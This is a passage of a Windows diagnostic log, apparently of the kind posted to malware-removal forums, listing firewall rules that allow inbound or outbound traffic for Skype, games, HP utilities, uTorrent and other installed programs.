"{63348565-A330-4669-8959-2FB3FF275631}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstra.exe | 
"{63899532-106D-44A3-9977-9F5B96074B92}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{638C1226-A86A-4F6E-91FE-245AA29D7AFC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{64EFCC4A-414E-42DB-B5FB-B50D0A378238}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{653A7E0B-33C9-44E1-AF99-B4F0336AE429}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{65F8FDD7-2783-4FD3-BF0F-9FCE72052A03}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{668229AB-1999-4C44-A12A-3D2D626C6AD4}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{67350512-EE95-47FA-9EB5-9F28AF8A8FF1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{673B49EC-E970-4DFE-AD04-CF828E3CECD9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{680FCD49-D75E-4F9D-AAED-821194DD3581}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{697FE43C-B6BA-48E9-A443-DDB972A96DAD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6A56B1ED-BA11-4E20-AA88-7A4EE5844B69}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6AABBAF7-1F13-44E2-A0A1-E9AD59197588}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6B548E3A-0A10-42DA-8E1B-948F71F1FAC5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6BDA4C77-98AA-414B-9B1C-50D50A798BF3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6C013E29-C9DD-4918-9945-8D63A27A0B87}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6C27A408-AAB7-4572-982D-DE0BE4EE5F06}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6C4360C0-BAB3-47C9-88CB-4B5605116282}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6C5C119E-2C54-49D5-8204-552918F545D2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6CE70854-3EF0-45F9-B896-8D81B683AE92}" = protocol=17 | dir=in | app=c:\nexon\combat arms\nmservice.exe | 
"{6DFD526B-48AA-42EE-AF32-7FDCAA206ABD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6E773AFA-F20D-48CD-B9BB-A608F4535896}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6F517835-5B1D-4B64-A8C6-F8BA0BE6CAD6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{6F6A031D-2E52-4751-8197-2476A3784929}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{707072AE-1F47-484B-BD44-CFF9AD94BB51}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{70A38839-4E96-463C-A967-652E2B336363}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{71149253-B5BA-473E-B112-2ECB3E09B59B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{711F2AA9-F9E9-4099-B217-0EFF39D75427}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{714151CD-55B9-472D-91E1-9376084A13D4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{72E62DEB-9E7C-42FD-8559-AFB252DB82E9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{72E666D9-D297-4296-A02B-5A0FC0FA40B3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{73125B32-D296-4FC4-A562-03DB5112CC65}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7329F995-B297-4571-8B47-77FB70092C3E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{733952E6-83D4-4070-8B28-D47A9A1A495B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7406C8DC-4CAD-4797-B32F-405961B3205E}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgpc01.exe | 
"{74914038-45E3-4BAE-9081-78DF4213149F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{755B7DA2-F4AA-4A4C-AB9F-42F452B3752D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{756CEA48-99C1-49ED-A922-BE19392EB414}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{757BF7C3-F7F9-44DD-B849-783D77F2949F}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{76ADDEF7-FF51-481B-B6D4-7D455E1D3A32}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{777F6803-BEF7-4859-A13A-08B203AF58E3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{77D0EDBD-5FF4-47AF-9F2C-D9F2FC5BF907}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{781CD2F1-3E60-4FFE-B4F4-0C7D815B9A71}" = protocol=17 | dir=out | app=%systemroot%\ehome\ehshell.exe | 
"{79C30A95-B74C-42A7-B791-50A151839703}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{79CA2C08-5C32-4ABD-8CBF-07B1097156CA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{79DDC27D-DF01-4D6A-830C-8E3F248A49BB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7B1F5D96-C5EB-4277-9AE1-77D576A35531}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7B340FE5-867C-4154-9C0C-339C38562EFF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7B4AAA1D-4ECF-4AD0-A052-077ECB912D8B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7B60CCCD-5EB5-4541-A73F-86915ADEB284}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7B92C4CA-A8B7-4304-9DC0-EA00D85A58BB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7B9317E9-D703-480E-9989-503D9E65AA60}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe | 
"{7BE1761F-053A-4469-BF87-CE623CB3F63C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7C138C93-B122-4EC0-8135-171C5F6EF435}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7C349409-C835-4BBA-BF81-EFB5B19E30C3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7C9CAEBF-CFC4-4F10-B195-BEC2BC195810}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7D1357F7-0A60-40DB-A341-E40C4BE86404}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7D281582-BA4A-4B71-B00F-D1EE2366B271}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\ava\nwzlauncher.exe | 
"{7D7A0E81-B512-45C8-B02B-A6BF5931E9F4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7DD0649B-5385-4F8E-954D-92D3373A763F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7E8BC54D-7152-4660-BF42-4676E54417A6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7EE0811C-4DF4-431E-94FA-BF9FC492DA08}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7F13BC65-6E87-4829-A7C3-5FF4350AE9B2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7F8C78D3-CE7D-481F-807D-F36F4D24F8F3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{7FF03F1D-DAE2-4573-A636-B7568F95DD35}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{80028C2F-FE4A-4C00-B58E-D29AAFBC9BF9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{805C0BB2-56BF-40EA-A4E4-53E2C026C72D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{80645355-AD00-42F1-9D6E-0F70A420AB10}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8144C491-C65B-4896-B572-B01AA324C2A6}" = protocol=6 | dir=in | app=c:\program files (x86)\codemeter\runtime\bin\codemeter.exe | 
"{81541CA7-133B-4F68-B6AD-082F6EFC3630}" = protocol=17 | dir=in | app=c:\users\nick\appdata\roaming\dropbox\bin\dropbox.exe | 
"{81793ABF-BA79-484B-8F52-66975A38B3F2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{819EB0D9-2755-474D-9154-6966F519040A}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqcopy2.exe | 
"{81EB603A-9A00-4DC9-9DB6-CD1F34C51E12}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{825E361C-2B0D-47EE-BCD1-CE20C5109EF2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{827D15BF-635B-47A1-B72C-DC48E4112C7B}" = protocol=6 | dir=in | app=c:\users\owner\appdata\roaming\utorrent\utorrent.exe | 
"{833C76BE-8D21-4CAF-884D-23252C6041C9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{83754467-22A7-4295-A039-85F0D97734CD}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead 2\left4dead2.exe | 
"{83B4D251-FD65-47FC-994D-582E2284BBC9}" = dir=in | app=c:\program files (x86)\hp\digital imaging\smart web printing\smartwebprintexe.exe | 
"{841814DE-2249-44A5-9859-6E32A784D883}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{841DCF71-37DF-4BD6-8F79-40DCD9A0887E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{84EEE7E9-C646-446E-A6CD-2B64F4D5F3FB}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\blacklightretribution\blacklight retribution.exe | 
"{84FCABEB-DE07-450E-ABB9-924A1D2D82B3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{85FB1D66-AA9D-41EC-A7C9-2B10DA7057DA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{862BFD6E-296C-489B-8F53-FCE382E19918}" = protocol=6 | dir=in | app=c:\program files (x86)\common files\adobe\cs4servicemanager\cs4servicemanager.exe | 
"{864208F3-D6C5-4BC9-9F59-9CD29519C9A6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{87311DC0-6B47-4006-837A-3A3F12128A63}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{87677B2F-B513-4942-A296-4BEEB5E70E00}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8843BEBB-A8F7-4909-A63E-E2D2A13CFE0B}" = protocol=17 | dir=in | app=c:\program files (x86)\aim\aim.exe | 
"{88734FD4-75B1-46CB-8D3F-DADBF3CFBCA5}" = dir=in | app=c:\program files (x86)\hewlett-packard\media\dvd\hpdvdsmart.exe | 
"{89B79FF7-F1C6-4BEB-B0A6-7E3096C70309}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\blacklightretribution\blacklight retribution.exe | 
"{8A2F6D46-F470-45AE-A7A6-D4D3B07D9EC3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8A4030C5-C119-4AF1-B9EB-F7D372FF675A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8A7C2377-7957-430F-9AB0-806E78A2DB53}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8AB0118C-4E18-4871-9F33-2394596AD1FB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8B240CFC-CCC9-4CA0-BBA5-FE9E27BA7A7E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8B41C870-B777-4AB0-8751-CA5F59CB334A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8CA592A8-49F6-4B97-BCDD-F7A620998D1F}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe | 
"{8D39C6D3-AD00-4FD4-8756-E17626FE29EB}" = dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartphoto.exe | 
"{8DEEB25E-BA28-4FAF-85F2-B57D5A1724E6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8E8AAEB7-C5FB-4DCC-B61C-8160AD57CA7C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8F04CC3F-D65C-4B0C-9C74-AA373B84CCF6}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tacticalintervention\bin\tacint.exe | 
"{8F0CB4C1-0A93-4704-805D-C522284E1EB5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8F0DE1A3-9EE9-46A7-B506-BAFC18E4FBFB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{8F1FF826-EE36-456F-B1FD-0CA4898E088C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{90035392-FF3D-4FD2-AA7C-1A56BFC9F0BD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{90587CA9-EA31-4F67-BB4D-47E12EB5CC37}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{906B952F-DC6B-4335-A9F3-DE9BAF326024}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{90AD3AEF-E7DC-4241-823A-4505C213ECF0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{91709507-BE0A-4D01-9E04-4DF449822B8D}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstra.exe | 
"{92128394-78FA-41ED-97CE-099E4612B1EB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{929406CB-BD19-4816-9DFA-29D31C69F759}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{92C6D032-8666-466B-BB6B-945D534EF18C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{939A7D4B-9453-4C23-8AF2-8B9C1CA4AB29}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\america's army\aapg\binaries\aalauncher32.exe | 
"{93F85930-69E7-4E43-A556-443BA85E98EA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{94BFE19F-9739-4DAF-AA10-734312E3DD5A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{953308AF-813E-4F7D-A0F1-4F840BC96D6A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{96047A6A-A2C6-4B24-B8E5-92F5DAA523F4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{96077753-6DD3-4D2C-8265-18775CC234D6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{96866D05-426C-41E8-A259-6FC7D9DF9350}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{97A4F5FC-B7F7-466B-A3C7-4A16D563B5B1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{980E664C-8B99-4083-8EB0-1918AFFF6753}" = protocol=17 | dir=in | app=c:\program files (x86)\common files\adobe\adobe version cue cs4\server\bin\versioncuecs4.exe | 
"{982A46D9-7FEE-4DC8-B0BC-E44116F8D157}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{99643435-AB13-4A0F-AE7F-D56FEB1243A4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{99BFBE7B-E05B-47A0-8EB5-7975ABF192DE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9A3E53CE-B3B7-492B-AB87-6AB656B55558}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9A64F227-A17D-4871-9AFB-3695ECE78912}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9AC44264-6E74-4330-B36C-0FDC4388B676}" = dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\tsmagent.exe | 
"{9B7C2E36-AAD2-44B6-B65F-298CBBC0C784}" = dir=in | app=c:\program files (x86)\windows live\sync\windowslivesync.exe | 
"{9BD137E1-51E7-48A1-92C2-A682C1198416}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tacticalintervention\bin\tacint.exe | 
"{9C0CC9EA-4AC4-4743-8750-BC55156394DD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9C797E52-21FD-4DAC-96E6-0D7550C3F5BA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9D4EB667-5335-4109-A3A9-47C48378989B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9DC3DD2C-DC99-4C71-9EAD-05AC646B38AF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9F4C5A3C-A3C5-473C-8A61-33D3B7E1D766}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{9F80E6DA-379C-4432-9F62-12F8B62A4B66}" = protocol=17 | dir=in | app=c:\program files (x86)\codemeter\runtime\bin\codemeter.exe | 
"{A045D518-A640-4904-B078-D1DE6FDB19B4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A0606EE3-C2EC-4273-BEAF-ED0E1D92D900}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A0C8BCA2-6AB4-471A-8E4A-C0EE8955E9EF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A1281583-837C-4E48-B30B-C74C328FFF35}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A12B64DD-E70E-42A8-8A28-A41C0F1CE9B1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A1778D84-354C-4D53-A84A-61DD09502E17}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A1D99996-4A47-4D54-87C4-BFF0020432AD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A23A1BCF-DA27-4903-8C92-5192F13D9838}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{A2971765-4B92-4690-8A3B-F8DB83ED90CA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A2D221D4-0975-40B9-9FB2-DE16C86CFEC6}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\loadout\loadout.exe | 
"{A2E7B016-29FC-451D-8A8A-D2FE45667E72}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A32AB6B7-7866-4245-BA73-408806F4B201}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{A3891FBF-B61C-4B0A-ACE9-E9EDD1B7725C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\team fortress 2\hl2.exe | 
"{A3A5A234-8659-4B40-A387-4B609577E9AA}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{A3E1A9C1-923B-4572-80F2-DF6A7B283906}" = protocol=17 | dir=in | app=c:\program files (x86)\winamp\winamp.exe | 
"{A460599D-8824-46E1-B3F4-886BCABEA931}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A48AC466-B71C-4895-B8D3-B69544041EE2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A62DEC1A-2D82-4679-AEE9-738D5161463E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A7225C13-EB59-4EE2-B211-7AE876827F14}" = protocol=17 | dir=in | app=c:\program files (x86)\codemeter\runtime\bin\codemeter.exe | 
"{A755F717-A978-4C72-A6EB-3AE7BB9E230C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A76A35B4-EB03-4504-8628-1F6F992564CF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A76A695B-F52A-48DF-822F-70CF1E23929F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A7BA74E7-A4F3-423E-BCDB-20D3BB3BCB04}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A83B2853-6621-4C6F-8832-37581F9A0FB5}" = protocol=17 | dir=in | app=c:\users\nick\appdata\roaming\utorrent\utorrent.exe | 
"{A90D5F91-0927-4326-A18B-2363108271A9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{A9205536-6797-4DA5-BFDB-2DD1C11EDD6D}" = protocol=6 | dir=in | app=c:\users\nick\appdata\roaming\utorrent\utorrent.exe | 
"{A99FCFF9-B972-4970-96F4-5633F52ECED4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AA0C0A45-361E-460C-9FA1-077E865021F8}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\game\ncsa-live\ghostreconphantoms.exe | 
"{AAD3171B-2D89-4774-B1C6-11EA6B185B42}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\soldierfront2\dfubg.exe | 
"{AAE54F01-F02A-4118-B0F0-C0AFC5254DE4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AB1C2F79-1E57-4014-9112-ADADBFFBE746}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AC6E410D-FDB3-451A-A491-54F4FB56D764}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AD1A6DFD-AAF3-4B3B-8017-63AE2F30C192}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AE1A7DF6-2FA3-464E-B1E5-7BEAC1256449}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AEE0799A-F816-4644-BC6C-B5A2ABA05C2F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AEE6CC31-D79A-463B-93B6-54AD608409C5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AF3EB37B-7CD3-400E-91A4-A0573DEBA485}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{AF4A610B-411B-404B-8979-0BBB83B068A9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B1552C55-BC20-4A10-82AB-E7F63F7ED1B5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B1CC00F9-0E57-4C21-ABD2-D0CCE1D4E0F7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B25824EA-2874-4BCE-BD54-842711BB3A3A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B2A72E05-33B6-4704-A3A3-537CDF931C37}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\global agenda live\binaries\launcherbin\hirezlauncherui.exe | 
"{B2FF3371-AB45-4659-8A9B-BC08F4C85623}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B3369FD8-418C-4C7B-8A78-183CAF69619E}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\arcticcombat\gamelauncher_gp\mappingaccount.exe | 
"{B3499A8A-71A1-405F-9021-5B984F80748E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B38571B6-A347-468B-99DE-9B26F9873B9D}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{B38F2CC6-E845-46FB-BE71-54EBF837E0AD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B3991068-8383-4700-8B9F-683AD5C07CCA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B4069BE1-F1DE-44F8-B481-F239693D6A74}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead 2\left4dead2.exe | 
"{B4120EC3-BC27-4663-9CA7-FFE30AD8A7E3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B4362160-74AA-44A6-B955-D2EF36F959DD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B4403865-EDED-4648-B7FA-8A064D54F916}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B4460147-3B7B-446E-BCA0-28E77DFF57CA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B4847962-929C-4204-BBD5-19D5ABA8B4B6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B534D8BA-DCDF-45BF-AE07-41D974715F42}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B538B09F-5F43-46BD-8B44-F7D8EBB3E315}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B55E0A1B-413B-4E61-9B7C-EBFD0520D981}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B59AD2EB-CBD0-42D5-9CD0-29D3261315C4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B6803F20-2562-4278-B3C7-9CFB736949C0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B78A8546-808F-4D6C-AE7E-AEFEBBED1188}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B8E853AD-BD12-447E-B671-7F8BBB000648}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{B9BB6174-8814-4478-AE14-E90A4F3A4502}" = protocol=6 | dir=out | app=%systemroot%\ehome\ehshell.exe | 
"{BA538D76-2840-4051-A04C-C535AB7EB0C8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BA7445A0-469D-47D0-A65A-859A996D0170}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BAE5E0ED-8F02-455A-B3F0-FDDC50FBAED7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BBDEAEDE-552D-4272-8F65-A9625C8D081F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BC3F7316-8AEA-4DB1-A667-53DC4F730795}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BC466BE8-BCB8-4318-8608-772B6E58774A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BC862563-7E23-47C4-95B3-BBF32CA1DD77}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BCC1FACF-9BE8-4EA9-8BC0-28A730DC4D71}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgh.exe | 
"{BCED659B-6772-446E-B4F0-4823D4A352C6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BCF6DE31-A76D-45B6-BE8F-842C8AFDBE37}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstra.exe | 
"{BD249A6E-A3F2-42E2-8C65-59309A5200AF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BE1A54BA-559E-4126-9CA8-ED2C96E15BE8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BE342890-FF79-4F23-BD09-D2A14B519C93}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BE511C39-67A9-4B40-8138-C1D77F0A885B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{BF925073-BC47-4F5E-A548-617169ABC1CC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C02BDFB7-56CB-4CF6-B737-D43B58DEE117}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C0FA2DC2-FE89-467C-817B-25FBAB89A00A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C11B2FB1-1473-40E5-968B-B83334220877}" = protocol=17 | dir=in | app=c:\program files (x86)\common files\adobe\cs4servicemanager\cs4servicemanager.exe | 
"{C234EDDF-BED9-444F-A7A3-FAC88EB0921D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C24B7D81-9811-4FC0-932B-B65D317800A0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C2F289FD-17C8-4A2D-B686-7251386BA486}" = dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartmusic.exe | 
"{C32F008C-6CCC-484E-B8D3-E8BD58077314}" = protocol=17 | dir=out | app=%systemroot%\ehome\ehshell.exe | 
"{C3384352-8D4A-4042-86CC-FF040140D8FD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C383A55C-22B4-4183-8512-E8E98BB33906}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C3CABAA4-F8D5-49B0-A124-8A09EBD17744}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C455DF9C-284C-482E-94BD-F6F6B63AAE30}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C58E94EA-E0C0-448E-986A-05C1DF4DC7B0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C592332E-779B-4C51-99BD-EC9EBC87C8E2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C6C9BA32-9E7F-497C-95CA-3AE02A33F0D5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
